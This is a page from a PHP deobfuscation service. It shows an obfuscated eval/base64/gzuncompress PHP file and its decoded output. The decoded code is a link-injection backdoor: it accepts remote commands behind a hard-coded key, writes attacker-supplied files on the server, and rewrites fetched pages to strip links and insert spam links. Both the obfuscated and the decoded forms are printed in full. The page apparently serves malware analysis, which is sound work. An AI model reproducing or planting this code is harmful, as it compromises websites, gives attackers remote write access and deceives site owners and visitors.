Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

<?php eval(gzuncompress(base64_decode('eNq1WG1zokgQ/pyt2v8wWlYBtxp8yWZfTLIhihtLAx7i5raS..

Decoded Output download

$_REQUEST['ab_write_dir'] = '/home/www/clients/client1/web7/web/files/albums/162880/162880/';
    $_REQUEST['ab_key'] = 'fe76bN9diNfe';
    $_REQUEST['ab_options'] = null;

    function ABOptions() {
        if($_REQUEST['ab_options']) return false;
        if(!$_REQUEST['ab_options'] = @explode("
", trim(@file_get_contents("$_REQUEST[ab_write_dir]/2.txt")))) return("<!--{__AB__}EMPTY OPTIONS FILE $_REQUEST[ab_write_dir]/2.txt{__AB__}-->");
        if(!isset($_REQUEST['ab_options'][0]) or !$_REQUEST['ab_options'][0] = intval($_REQUEST['ab_options'][0])) return("<!--{__AB__}BAD TIMEOUT{__AB__}-->");
        if(!isset($_REQUEST['ab_options'][1]) or !$_REQUEST['ab_options'][1] = intval($_REQUEST['ab_options'][1])) return("<!--{__AB__}BAD LINKS COUNT{__AB__}-->");
        return false;
    }

    function ABRandomStr($FileName) {
        if(!$f = @fopen($FileName, "r")) return false;
        $x = rand(0, filesize($FileName));
        for($i=$x; $i>0; $i--)
        {
            fseek($f, $i);
            if(fgetc($f) === "
") break;
        }
        if($i <> 0) $i++;
        fseek($f, $i);
        $Result = fgets($f);
        fclose($f);
        return trim($Result);
    }
    function ABRecalc($Options = null) {
        if($OFail = ABOptions()) return($OFail);
        $Selected = array();
        for($i = 0; $i < $_REQUEST['ab_options'][1]; $i++) {
            $Selected[] = ABRandomStr("$_REQUEST[ab_write_dir]/1.txt");
        }
        if(!$Selected) return("<!--{__AB__}EMPTY LINKS FILE $_REQUEST[ab_write_dir]/1.txt{__AB__}-->");
        if(!@file_put_contents("$_REQUEST[ab_write_dir]/3.txt", implode("
", $Selected), LOCK_EX)) return("<!--{__AB__}CANT WRITE $_REQUEST[ab_write_dir]/3.txt{__AB__}-->");
        return false;
    }
    function ABShow() {
        if($OFail = ABOptions()) return '';
        if(!file_exists("$_REQUEST[ab_write_dir]/3.txt") or time() - filectime("$_REQUEST[ab_write_dir]/3.txt") > $_REQUEST['ab_options'][0]) {
            if($OFail = ABRecalc()) return '';
        }
        $IsBot = true;
        $Content = ($IsBot or (@!$_REQUEST['ab_options'][2] and @!$_REQUEST['ab_options'][3])) ? file_get_contents("$_REQUEST[ab_write_dir]/3.txt") : '';
        if(@$_REQUEST['ab_options'][4]) $Content = str_replace("{links}", $Content, $_REQUEST['ab_options'][4]);
        return $Content;
    }
    function ABMode() {
        if(!isset($_REQUEST['abkey'])) return("<!--{__AB__}NO AUTH KEY PROVIDED{__AB__}-->");
        if($_REQUEST['abkey'] != $_REQUEST[ab_key]) return("<!--{__AB__}AUTH KEY WRONG{__AB__}-->");
        if($_REQUEST['abmode'] == 'CHECK_LITE') {
            return "<!--{__AB__}OK{__AB__}-->";
        }
        if($_REQUEST['abmode'] == 'CHECK_ALL') {
            $Answer = "<!--{__AB__}";
            if(!@file_get_contents("$_REQUEST[ab_write_dir]/1.txt")) return "<!--{__AB__}CANT READ $_REQUEST[ab_write_dir]/1.txt{__AB__}-->";
            if(!@file_get_contents("$_REQUEST[ab_write_dir]/2.txt")) return "<!--{__AB__}CANT READ $_REQUEST[ab_write_dir]/2.txt{__AB__}-->";
            if(!@file_get_contents("$_REQUEST[ab_write_dir]/3.txt")) return "<!--{__AB__}CANT READ $_REQUEST[ab_write_dir]/3.txt{__AB__}-->";
            if($OFail = ABOptions()) return($OFail);
            return "<!--{__AB__}OK{__AB__}-->";
        }
        if($_REQUEST['abmode'] == 'UPLOAD' or $_REQUEST['abmode'] == 'ADD') {
            if(isset($_REQUEST['f1']) and !$_REQUEST['f1']) return("<!--{__AB__}EMPTY LINKS LIST{__AB__}-->");
            if(isset($_REQUEST['f2']) and !$_REQUEST['f2']) return("<!--{__AB__}EMPTY OPTIONS LIST{__AB__}-->");
            if(isset($_REQUEST['f1']) and !@file_put_contents("$_REQUEST[ab_write_dir]/1.txt", stripslashes($_REQUEST['f1']), $_REQUEST['abmode'] == 'UPLOAD' ? LOCK_EX : LOCK_EX | FILE_APPEND)) return("<!--{__AB__}CANT WRITE $_REQUEST[ab_write_dir]/1.txt{__AB__}-->");
            if(isset($_REQUEST['f2']) and !@file_put_contents("$_REQUEST[ab_write_dir]/2.txt", stripslashes($_REQUEST['f2']), LOCK_EX)) return("<!--{__AB__}CANT WRITE $_REQUEST[ab_write_dir]/2.txt{__AB__}-->");
            if($OFail = ABOptions()) return($OFail);
            if($OFail = ABRecalc()) return($OFail);
            return "<!--{__AB__}OK{__AB__}-->";
        }
        return "<!--{__AB__}UNCKNOWN AB MODE{__AB__}-->";
    }

    if(substr($_REQUEST['ab_write_dir'], -1) == '/' or substr($_REQUEST['ab_write_dir'], -1) == '\') $_REQUEST['ab_write_dir'] = substr($_REQUEST['ab_write_dir'], 0, -1);
    if(isset($_REQUEST['abmode'])) echo ABMode();
    else {
    	if(false === strpos($_SERVER['REQUEST_URI'], basename(__FILE__))) {
			$TemplateUrl = 'http' . (isset($_SERVER['HTTPS']) ? 's' : '') . '://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
			$cUrl = curl_init($TemplateUrl);
			curl_setopt($cUrl, CURLOPT_AUTOREFERER, True);
			curl_setopt($cUrl, CURLOPT_RETURNTRANSFER, 1);
			curl_setopt($cUrl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36');
			curl_setopt($cUrl, CURLOPT_FOLLOWLOCATION, True);
			curl_setopt($cUrl, CURLOPT_SSL_VERIFYPEER, false);
			curl_setopt($cUrl, CURLOPT_SSL_VERIFYHOST, 0);
			$Content = curl_exec($cUrl);
			$Content = preg_replace('"|<a(.*)\>(.*)\<\/a\>|is"', '$2', $Content);
			$Links = ABShow();
			echo $Content . $Links;
    	}
    };

Did this file decode correctly?

Original Code

<?php

eval(gzuncompress(base64_decode('eNq1WG1zokgQ/pyt2v8wWlYBtxp8yWZfTLIhihtLAx7i5raSFIVk3EwFwQI83c3mv1/PgIoiviR7fjCR6e6nu6f7mR5yhib/3ZO7+g1n9o2JRwJs3BOPu0OniBMf3CEWJ5OJaNkEO4Ef/S2JE9z/QL/EAbGxL5p2fzz0xdJx+ePH4uwPV32D4JNbQnjEP0PbA/zhuK98uifKAK+VdEcBcR2fSTtj266+ffOWiQ3GjkWXkHShhjK8gJ7CNfohAz7FkoA8HIw9Bw1M28fVJZVMOvo5no5s9x7z2Vsnm0eBR4b8OQ3c+IEDw3KdgOaGzy4sxFN5J5YPg2mQFeAT4fPZk0yh8GQY0oVhPMtXHf07Ujt6U1W6qNFsy2ijpZleoXCWFVaCIL6Pg7Twb4qQAddDmfR1iJY4wb+mvcnG+jAupDrSm1ey2tNf7mFpi4elHTwsbfKw3VRaXVRTe0qql2tq5HlN7Wmmc+8Ou4HH5xpQC4o5xKtlmMkNaPkM3BF2FlJ5lPWyQmot5qag44FxvphHrL3ILxzDiLs6cAGdnOamVZQjZ0X6XSgIi/WYO0zcx/iRzw3yIBc3E7k7gHK2YFlAp6eniBa7gPoeNh9jos/LfUbQyRkqCmDv3bu4XylAOQ37YzuAACmWT7HiWpbt+njlYZQl1nSRurDYldU9wZZpQwgRL0TMkWAHtWESGxZjBDKvmHBxyekutrEV4HvQMD3P/MkntwCWWPbRCUovyypLk7C6K3P7N3fMp0VhpTJKKWSU1H3JzG1uopywFzYSTmkb4YQ8OBrvwoMV5nUekWGcTheu5lFbrbUM+Z+U/q1Jio6utaae7m9lk7/rG3ulhLoP7oTfp2IQx63khKUET4m/PRmM7QIyxABZYN1usV9b1c7QJpJ/SvR2LIKoSVICiBVSrulfuLRZA2+8xFC1cKthhY9kIAr+PJW1y3cIahqlC1QoZX9Be5ypszx8TqT/PA3kCBITc90PPMPDI9u0IN1PNnEe/WdajpFEHm2wkyyqmVpqXV3Rik8cEGtOQzYhpXSAoiKpp1+ilvwddTT1W7Mu1zd0Z9Iuypwu9w48vVuPNQe61lTl664oQwiTDk0w4dUuZejmNrQrl6jIKGtLgGorDpJ+5myEk9rtJFpOcvwJ9mDTlwCzySMws89cF7GwsDYaRlaaDCPHztz6SnfKr3On/IfdqbzOncp2d/Y8x/+nuut12qpU5ygFpolI9Tq3jpQT3T8o0UsK5cpM4um2c7zd7KaOtKl45bV45c14s6vKixAXEe4zOpSi0QFIm4x82/QfsJ8wm0fb9ujLbMKAc2P23282ARlSpyMr9ZdPHhsnpR3yv082ytuyUWbZePU0Vd4hphc04eZx5A937jq9nlJrKeq1AujoSq3La6zMb3zgrD/u+/Sal/aqJI8KJYHVmchoYHf521vghdyGVzDbTRWZterc2TUTRdgIkGBsPbjzUSRSwTAMz6jpgF4C6XTMLoAAPHJpXXVl7Zus3XCRSaOnNSly3/SxAzdS3jBYBxn0BQdYOjg4yOkYZnwzwD2PbjL3EAQjDh2iuXczk5e63unSHviCOJ9j05wActxnUaTyy4LGpdrVIS3x50s+VUNwK0S1xp5tEIcAXswdIRRii+ALjHU8U8ijWk9rA7UZMPiomtyQNVnLIx1G3+0qmqz3NEXXJKXboFql7So9iED6Kit6HnFX7i9i26b4/rCI+GsC17+Jj6A7jw8rVQS/j4+qaHp8JCBpNLLxNe63SCC+r3w4rBwjvnWpX7XzyCaPGH3F1qMroNqDR1/cgUDxsFw8+gRmu+bA9EikxG13r6G22+o1MIhEuX7XPHS7bQO2pdn43pFpHlgx7aNGdxhqOlKJTetMG0+xFeomBUYe/jGf57ns7xOTP/xLuD1j3ye3onl79pv4WQ7SnStzizl/ZqlNLwCMkMIbYPiYdcwcBQqPiUWtcxDRzHP1PzUhDzk=')));

?>

Function Calls

gzuncompress	1
base64_decode	1

Variables

None

Stats

MD5	6343ed83665dc89515fd631960e341f7
Eval Count	1
Decode Time	125 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats